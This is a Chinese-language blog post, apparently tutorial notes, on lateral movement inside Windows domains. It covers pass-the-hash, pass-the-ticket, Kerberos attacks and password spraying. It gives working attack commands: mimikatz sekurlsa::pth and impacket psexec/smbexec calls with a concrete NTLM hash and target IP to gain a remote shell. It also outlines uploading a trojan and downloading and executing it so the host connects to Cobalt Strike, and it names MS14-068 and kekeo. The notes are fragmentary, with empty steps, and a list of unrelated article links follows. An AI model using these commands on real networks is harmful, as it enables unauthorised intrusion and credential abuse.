内网安全-横向移动&PTH 哈希&PTT 票据&PTK 密匙&Kerberos&密码喷射

一.域横向pth,mimkatz,NTLM

windwos server 2012 R2之前可能是NTLM和LM,之后为NTLM

1.mimkatz ptk

使用mimkatz进行横向移动

mimikatz sekurlsa::pth /user:administrator(目标本地用户名) /domain:192.168.3.32(目标ip) /ntlm:518b98ad4178a53695dc997aa02d455c(目标hash)

在执行命令机器弹出cmd窗口

使用该命令进行传递木马

创建bshell:

执行:

在内网攻击机器进行hash传递

cs上配置socket节点

配置代理

使用psexec进行hash传递返回被控机器shell终端:

.\psexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

上线cs:

1.上传木马到web目录

2.使用cmd下载木马并且执行

使用smbexec进行传递

.\smbexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

2.pth-漏洞&kekeo&Ticks

1.ms14068

2.kekeo(高权限,需要NTGM)

相关推荐
007tg15 分钟前
LINE 账号安全与权重提升实战指南:行为模拟与风控规避策略
安全
数据库安全5 小时前
《金融电子化》:构建金融韧性运行安全体系:从灾备管理到主动防御新范式
大数据·安全·金融
会开花的二叉树8 小时前
应用层网络协议深度解析:设计、实战与安全
网络·网络协议·安全
红树林078 小时前
beef-xss网页无法访问
安全·web安全·xss
wanhengidc9 小时前
站群服务器都有什么作用
服务器·安全·智能手机·玩游戏
鲜枣课堂9 小时前
重新安全定义,IMS算网融合加速企业专网AI+场景落地
大数据·人工智能·安全
kali-Myon9 小时前
NewStarCTF2025-Week3-Web
sql·安全·web安全·php·ctf
有谁看见我的剑了?9 小时前
Rocky 9 安装 Elasticsearch分布式集群基于非安全特性
分布式·安全·elasticsearch
晓梦林9 小时前
万字解析upload-labs靶场(基于cyberstrikelab网络安全仿真平台)
安全·web安全
网安INF11 小时前
网络攻防技术:防火墙技术
网络·安全·web安全·网络安全·防火墙